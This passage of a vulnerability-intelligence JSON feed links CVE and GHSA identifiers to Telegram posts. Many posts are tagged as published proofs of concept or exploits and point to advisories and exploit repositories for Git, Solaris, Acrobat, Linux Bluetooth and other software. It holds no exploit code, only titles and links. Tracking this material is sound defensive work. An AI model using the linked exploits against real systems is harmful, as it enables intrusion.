\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u044e\u0449\u0438\u0439 \u0447\u0435\u0440\u0435\u0437 Shodan \u0438\u043b\u0438 \u0447\u0442\u043e-\u0442\u043e \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0439 \u0435\u0435. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0446\u0435\u043b\u044b\u0435 \u0434\u0430\u0442\u0430-\u0446\u0435\u043d\u0442\u0440\u044b \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c\u0438, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u0438 \u043a \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043c\u043d\u043e\u0433\u0438\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432.\n \n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Cisco Talos, \u0432 \u043c\u0438\u0440\u0435 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 168 000 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432, \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u044b\u0445 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u044f\u0441\u043d\u044b, \u043d\u043e \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0447\u0435\u043d\u044c \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u043c\u0438.\n \n\u0414\u043b\u044f \u0430\u0434\u043c\u0438\u043d\u043e\u0432: \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0441\u0432\u043e\u044e \u00ab\u0446\u0438\u0441\u043a\u0443\u00bb \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u043d\u043e, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 show vstack config. \u0415\u0441\u043b\u0438 \u0432 \u043e\u0442\u0432\u0435\u0442 \u0441\u0432\u0438\u0442\u0447 \u0432\u044b\u0434\u0430\u0435\u0442 \u0432\u0430\u043c \u201cSmartInstall enabled\u201d, \u0442\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0439\u0442\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 no vstack. \n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0437\u0434\u0435\u0441\u044c: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi", "creation_timestamp": "2018-04-07T12:32:04.000000Z"}, {"uuid": "d3c7410b-368e-4504-b7d2-1000d0763aa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:4059", "type": "seen", "source": "https://t.me/VulnerabilityNews/27428", "content": "It was discovered that the update for the virt:rhel module in the RHSA-2020:4676 (https://ift.tt/PRW3jtu) erratum released as part of Red Hat Enterprise Linux 8.3 failed to include the fix for the qemu-kvm component issue CVE-2020-10756, which was previously corrected in virt:rhel/qemu-kvm via erratum RHSA-2020:4059 (https://ift.tt/tqpc1GB). CVE-2021-20295 was assigned to that Red Hat specific security regression. For more details about the original security issue CVE-2020-10756, refer to bug 1835986 or the CVE page: https://ift.tt/kDXvcR8.\nPublished at: April 02, 2022 at 01:15AM\nView on website", "creation_timestamp": "2022-04-02T02:42:56.000000Z"}, {"uuid": "607e2f7e-3b87-44c2-915e-2c340626a2e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:4676", "type": "seen", "source": "https://t.me/VulnerabilityNews/27428", "content": "It was discovered that the update for the virt:rhel module in the RHSA-2020:4676 (https://ift.tt/PRW3jtu) erratum released as part of Red Hat Enterprise Linux 8.3 failed to include the fix for the qemu-kvm component issue CVE-2020-10756, which was previously corrected in virt:rhel/qemu-kvm via erratum RHSA-2020:4059 (https://ift.tt/tqpc1GB). CVE-2021-20295 was assigned to that Red Hat specific security regression. For more details about the original security issue CVE-2020-10756, refer to bug 1835986 or the CVE page: https://ift.tt/kDXvcR8.\nPublished at: April 02, 2022 at 01:15AM\nView on website", "creation_timestamp": "2022-04-02T02:42:56.000000Z"}, {"uuid": "bd767eb6-5596-4ceb-9511-84da1ac39dc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HV3-7C34-4HX8", "type": "seen", "source": "https://t.me/VulnerabilityNews/31474", "content": "HashiCorp Nomad 0.5.0 through 0.9.4 (fixed in 0.9.5) reveals unintended environment variables to the rendering task during template rendering, aka GHSA-6hv3-7c34-4hx8. This applies to nomad/client/allocrunner/taskrunner/template.\nPublished at: December 26, 2022 at 10:15PM\nView on website", "creation_timestamp": "2022-12-27T00:42:21.000000Z"}, {"uuid": "3a8e1842-8191-4802-8689-4b8e0dac1b74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFM5-V35H-VWF4", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2483", "content": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wfm5-v35h-vwf4\n\nhttps://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx\n\nCVE-2023-40590\n#github #poc #\u5206\u6790", "creation_timestamp": "2024-05-14T01:13:35.000000Z"}, {"uuid": "823e9d8b-a031-40e9-ab8f-2745f61a70d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MQJ-M65W-JGHX", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2483", "content": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wfm5-v35h-vwf4\n\nhttps://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx\n\nCVE-2023-40590\n#github #poc #\u5206\u6790", "creation_timestamp": "2024-05-14T01:13:35.000000Z"}, {"uuid": "923c1722-033d-4905-a13b-51f9f42b21ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MHH-27V7-3VCX", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/593", "content": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2mhh-27v7-3vcx\nAVideo Authenticated RCE\ncve-2023-30854\n#github", "creation_timestamp": "2023-05-25T09:36:02.000000Z"}, {"uuid": "8b60aea6-b7a2-4f5d-8698-85e1500cf7fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX8W-MQ23-29G4", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2481", "content": "https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4\n\nCVE-2024-24747\n#github #\u5206\u6790", "creation_timestamp": "2024-05-14T01:05:39.000000Z"}, {"uuid": "181b219f-7859-407a-b5a2-193903a31ff4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6WX7-QW5P-WH84", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2268", "content": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84\n\ncve-2024-28255\n#\u5206\u6790 #poc #github", "creation_timestamp": "2024-04-07T13:48:20.000000Z"}, {"uuid": "3931772f-0910-4d6e-aa4e-2259e9236ef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJPP-CM9X-6RWJ", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2480", "content": "https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwj\n\nCVE-2024-29201\n#github #exploit", "creation_timestamp": "2024-05-14T00:51:57.000000Z"}, {"uuid": "d9dd649f-05af-4529-b3fb-794486819ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GRX-V727-QMQ6", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2834", "content": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6\n\ncve-2024-39907\n#github #poc", "creation_timestamp": "2024-07-23T17:20:16.000000Z"}, {"uuid": "f00add11-ed5f-4c5f-982b-a495b1de06dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG6G-RRJ6-XFG6", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2796", "content": "https://github.com/pi-hole/pi-hole/security/advisories/GHSA-jg6g-rrj6-xfg6\n\nBlind Server-Side Request Forgery (SSRF) can lead to Remote Code Execution (RCE)\n#github #exploit", "creation_timestamp": "2024-07-17T10:03:32.000000Z"}, {"uuid": "ccfb5d82-0168-4b4b-bc0a-5bebed64042c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JCV-VP96-94XR", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3146", "content": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr\n\nBypass SSRF Protection with DNS Rebinding\n#github #poc", "creation_timestamp": "2024-09-10T17:44:13.000000Z"}, {"uuid": "f16b0bd9-fb0f-4111-a871-d8ec4e813009", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3219", "content": "https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6\n\ncve-2024-47062\n\n#github #poc", "creation_timestamp": "2024-09-25T16:35:07.000000Z"}, {"uuid": "91ac42d8-5300-42cf-8734-204d17dab4d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-584Q-6J8J-R5PM", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3375", "content": "https://github.com/cryptocoinjs/secp256k1-node/security/advisories/GHSA-584q-6j8j-r5pm\n\nPrivate key extraction over ECDH cve-2024-48930\n#github #exploit", "creation_timestamp": "2024-10-29T18:42:14.000000Z"}, {"uuid": "853b8222-bee4-40c7-80ca-fdd14e69e5d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MXR5-MC97-63RC", "type": "exploited", "source": "https://t.me/arvin_club/5124", "content": "\u0627\u062d\u062a\u0645\u0627\u0644 \u062f\u0627\u062f\u0647 \u0645\u06cc\u0634\u0647 \u0647\u06a9 \u0648\u0628\u0633\u0627\u06cc\u062a \u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u0627\u0648\u06a9\u0631\u0627\u06cc\u0646 \u062f\u0631 \u0637\u0648\u0644 \u0686\u0646\u062f \u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0627\u062a\u0641\u0627\u0642 \u0627\u0641\u062a\u0627\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc CVE-2021-32648 \u06a9\u0647 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 cms \u0627\u06cc\u0646 \u0633\u0627\u06cc\u062a \u0647\u0627 \u0647\u0633\u062a \u0627\u062a\u0641\u0627\u0642 \u0627\u0641\u062a\u0627\u062f\u0647 \u0628\u0627\u0634\u0647 \nhttps://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc", "creation_timestamp": "2022-01-16T18:19:49.000000Z"}, {"uuid": "f9821dce-58fc-4c21-8dd0-fa15a5b26e1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqq7-wxx5-mp8h", "type": "seen", "source": "https://gist.github.com/alon710/63a0b9d45c1b8aff3ea39f384d9c8809", "content": "", "creation_timestamp": "2026-05-01T06:10:28.000000Z"}, {"uuid": "ae46326a-c956-43ea-b95d-7ec3a1604a7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM7J-C969-7J4Q", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/970", "content": "#exploit\n1. CVE-2020-5260:\nMalicious URLs may cause Git to present stored credentials to the wrong server (credential.helper vulns)\nhttps://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q\n\n2. CVE-2020-2944:\nOracle Solaris &lt;=10 1/13 (Upd11) - LPE via CDE sdtcm_convert\nhttps://techblog.mediaservice.net/2020/04/cve-2020-2944-local-privilege-escalation-via-cde-sdtcm_convert/\n]-&gt; PoC:\nhttps://github.com/0xdea/exploits/blob/master/solaris/raptor_sdtcm_conv.c\n]-&gt; Oracle Security Advisory:\nhttps://github.com/0xdea/advisories/blob/master/2020-05-cde-sdtcm_convert.txt", "creation_timestamp": "2024-10-21T17:03:42.000000Z"}, {"uuid": "68d312e6-a8b7-4c53-b8cf-aaf8d826ec24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4MF-75HF-67W4", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/745", "content": "#Red_Team_Tactics\nAuth bypass via regex attack on Parse-Server Node.js module\nhttps://github.com/parse-community/parse-server/security/advisories/GHSA-h4mf-75hf-67w4", "creation_timestamp": "2022-12-11T18:39:53.000000Z"}, {"uuid": "b79e7f80-9112-49aa-940b-82f11cd9fcbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WQ5-PHMQ-M584", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/3556", "content": "#Threat_Research\n1. Linux: KVM VM_IO|VM_PFNMAP vma mishandling\nhttps://github.com/google/security-research/security/advisories/GHSA-7wq5-phmq-m584\n2. Attack surface of popular password managers\nhttps://lock.cmpxchg8b.com/passmgrs.html", "creation_timestamp": "2021-06-07T19:53:01.000000Z"}, {"uuid": "4eb9afe8-2db2-4d98-afab-da0619882fe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CCX2-W2R4-X649", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1918", "content": "#WLAN_Security\nBleedingTooth:\nVulnerabilities in Linux Bluetooth Allow 0-Click Attacks:\n1. CVE-2020-12351.\nHeap-Based Type Confusion in L2CAP:\nhttps://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq\n2. CVE-2020-12352.\nBadChoice - Stack-Based Infoleak in A2MP:\nhttps://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq\n3. CVE-2020-24490.\nHeap-Based Buffer Overflow in HCI event packet parser:\nhttps://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649", "creation_timestamp": "2024-07-19T19:59:44.000000Z"}, {"uuid": "8de4bc96-2629-4e20-92d7-4b746b3398fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H637-C88J-47WQ", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1918", "content": "#WLAN_Security\nBleedingTooth:\nVulnerabilities in Linux Bluetooth Allow 0-Click Attacks:\n1. CVE-2020-12351.\nHeap-Based Type Confusion in L2CAP:\nhttps://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq\n2. CVE-2020-12352.\nBadChoice - Stack-Based Infoleak in A2MP:\nhttps://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq\n3. CVE-2020-24490.\nHeap-Based Buffer Overflow in HCI event packet parser:\nhttps://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649", "creation_timestamp": "2024-07-19T19:59:44.000000Z"}, {"uuid": "a2c79aba-bfe3-41e3-84ce-811988deebe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MH3-GQ28-GFRQ", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1918", "content": "#WLAN_Security\nBleedingTooth:\nVulnerabilities in Linux Bluetooth Allow 0-Click Attacks:\n1. CVE-2020-12351.\nHeap-Based Type Confusion in L2CAP:\nhttps://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq\n2. CVE-2020-12352.\nBadChoice - Stack-Based Infoleak in A2MP:\nhttps://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq\n3. CVE-2020-24490.\nHeap-Based Buffer Overflow in HCI event packet parser:\nhttps://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649", "creation_timestamp": "2024-07-19T19:59:44.000000Z"}, {"uuid": "e22f1799-1278-481d-a1de-28fbeedd1d43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ5J-GW7F-JGJ8", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2064", "content": "Understanding &amp; Exploiting: CSRF vulnerabilities\nhttps://medium.com/bugbountywriteup/understanding-exploiting-cross-site-request-forgery-csrf-vulnerabilities-935952375b71\n]-&gt; CVE-2020-8167:\nCSRF Vulnerability in rails-ujs\nhttps://github.com/advisories/GHSA-xq5j-gw7f-jgj8", "creation_timestamp": "2020-11-08T18:57:01.000000Z"}, {"uuid": "d3815068-dd55-4115-94fc-9d52dbb8f38e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-673J-QM5F-XPV8", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5483", "content": "#Threat_Research\n1. Postgresql Arbitrary File Write Vulnerability\nhttps://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8\n2. Dragos 2021 Industrial Cybersecurity Year In Review Summary\nhttps://www.dragos.com/blog/dragos-2021-industrial-cybersecurity-year-in-review-summary", "creation_timestamp": "2022-02-24T11:07:01.000000Z"}, {"uuid": "d0feeb1a-7365-4697-a4cf-3c2ce27e0b8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCJX-PVPC-QGWQ", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4594", "content": "#exploit\nCVE-2021-41163:\nDiscourse &lt;2.7.9 - RCE via malicious SNS subscription payload\nhttps://0day.click/recipe/discourse-sns-rce\n]-&gt; https://github.com/discourse/discourse/security/advisories/GHSA-jcjx-pvpc-qgwq", "creation_timestamp": "2021-10-27T01:02:42.000000Z"}, {"uuid": "dace86d7-007a-47e7-b197-70e1091766b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJWM-RVH2-C87W", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4605", "content": "#Malware_analysis\n1. Vulnerable Billing Software BillQuick Web Used to Deploy Ransomware\nhttps://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware\n2. ua-parser-js malware\nhttps://github.com/advisories/GHSA-pjwm-rvh2-c87w", "creation_timestamp": "2021-10-26T12:49:25.000000Z"}, {"uuid": "267b3d15-d020-4536-b94d-b5223cd0933c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M985-3F3V-CWMM", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/3974", "content": "#Threat_Research\nCVE-2021-32749:   Fail2ban - RCE\nhttps://research.securitum.com/fail2ban-remote-code-execution\n]-&gt; RCE vulnerability in mailing action using mailutils (mail-whois):\nhttps://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm", "creation_timestamp": "2021-08-02T11:03:01.000000Z"}, {"uuid": "22222624-304f-4067-aea9-50ce056156bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6JX-9G48-2R5R", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4150", "content": "#exploit\nCVE-2021-37678:\nTensorFlow/Keras &lt;2.6.0 - Arbitrary code execution due to YAML deserialization\nhttps://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r", "creation_timestamp": "2021-08-25T12:12:54.000000Z"}, {"uuid": "caf51b11-21e9-4313-abc0-93188ce3660b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCCX-8H74-2357", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7274", "content": "#exploit\n1. Linux Kernel:\nUAF in Bluetooth L2CAP Handshake\nhttps://github.com/google/security-research/security/advisories/GHSA-pf87-6c9q-jvm4\nInfoleak in Bluetooth L2CAP Handling\nhttps://github.com/google/security-research/security/advisories/GHSA-vccx-8h74-2357\n\n2. Xiongmai IoT Exploitation\nhttps://vulncheck.com/blog/xiongmai-iot-exploitation", "creation_timestamp": "2022-11-30T11:37:23.000000Z"}, {"uuid": "09534f61-bbb0-47bd-a31b-11988f49c05b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PF87-6C9Q-JVM4", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7274", "content": "#exploit\n1. Linux Kernel:\nUAF in Bluetooth L2CAP Handshake\nhttps://github.com/google/security-research/security/advisories/GHSA-pf87-6c9q-jvm4\nInfoleak in Bluetooth L2CAP Handling\nhttps://github.com/google/security-research/security/advisories/GHSA-vccx-8h74-2357\n\n2. Xiongmai IoT Exploitation\nhttps://vulncheck.com/blog/xiongmai-iot-exploitation", "creation_timestamp": "2022-11-30T11:37:23.000000Z"}, {"uuid": "7f82d616-3162-43f7-baff-6bd376a6291d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7290", "content": "#Threat_Research\n1. HTTP Desync Attack (Request Smuggling) - Mass Account Takeover at a Cryptocurrency based asset and 121 other websites\nhttps://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md\n2. Visual Studio Code: RCE\nhttps://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m", "creation_timestamp": "2022-12-03T18:07:06.000000Z"}, {"uuid": "b63a18cc-3f03-443f-9958-dbefd23eeae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V95C-P5HM-XQ8F", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4922", "content": "#exploit\n1. CVE-2021-43784:\nrunc/libcontainer - insecure handling of bind mount sources\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=2241\n]-&gt; https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f\n\n2. CVE-2021-1048:\nrefcount increment on mid-destruction file\nhttps://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html", "creation_timestamp": "2021-12-07T15:16:34.000000Z"}, {"uuid": "fe864321-68ce-4bc4-932b-11d93f325597", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3CW5-7CXW-V5QG", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7677", "content": "#exploit\n1. CVE-2023-21608:\nAdobe Acrobat Reader DC - UaF - RCE Exploit\nhttps://github.com/hacksysteam/CVE-2023-21608\n\n2. SH1MMER Exploit for Chromebooks\nhttps://sh1mmer.me\n\n3. URI validation failure on SVG parsing\nhttps://github.com/dompdf/dompdf/security/advisories/GHSA-3cw5-7cxw-v5qg", "creation_timestamp": "2023-02-03T11:00:29.000000Z"}, {"uuid": "46a8dc62-bca7-48d3-a4f3-7a7e724cdde1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJ4W-6495-6CRX", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8109", "content": "#exploit\n1. CVE-2023-21817:\nKerberos LPE \nhttps://resee.it/tweet/1645565092229189632\n\n2. CVE-2023-1998:\nLinux Kernel: Spectre v2 SMT mitigations problem\nhttps://github.com/google/security-research/security/advisories/GHSA-mj4w-6495-6crx", "creation_timestamp": "2023-04-13T22:37:28.000000Z"}, {"uuid": "bd4c002c-9f34-49c9-a7fb-b994d74736d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ6W-Q6WH-JGGC", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7977", "content": "#exploit\n1. CVE-2023-28115:\nSnappy PHP Vulnerability: PHAR deserialization allowing RCE\nhttps://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\n\n2. CVE-2022-37337, CVE-2022-38452, CVE-2022-36429: \nNetgear Orbi Satellite router vulnerable to arbitrary command execution\nhttps://blog.talosintelligence.com/vulnerability-spotlight-netgear-orbi-router-vulnerable-to-arbitrary-command-execution\n\n3. CVE-2023-21800:\nWindows Installer EoP\nhttps://blog.doyensec.com//2023/03/21/windows-installer.html", "creation_timestamp": "2023-03-23T11:05:11.000000Z"}, {"uuid": "d0ea496b-547f-4bce-9823-94d89cf4ec7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6FF-G7MH-58Q4", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8434", "content": "#exploit\n1. CVE-2023-0455:\nBumsys Business Management System 1.0.3 - Shell 